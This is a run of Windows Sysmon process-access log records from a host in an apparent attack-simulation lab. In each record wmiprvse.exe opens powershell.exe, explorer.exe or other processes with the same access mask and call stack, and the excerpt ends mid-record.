16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-82AA-00000000AD01}13276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla 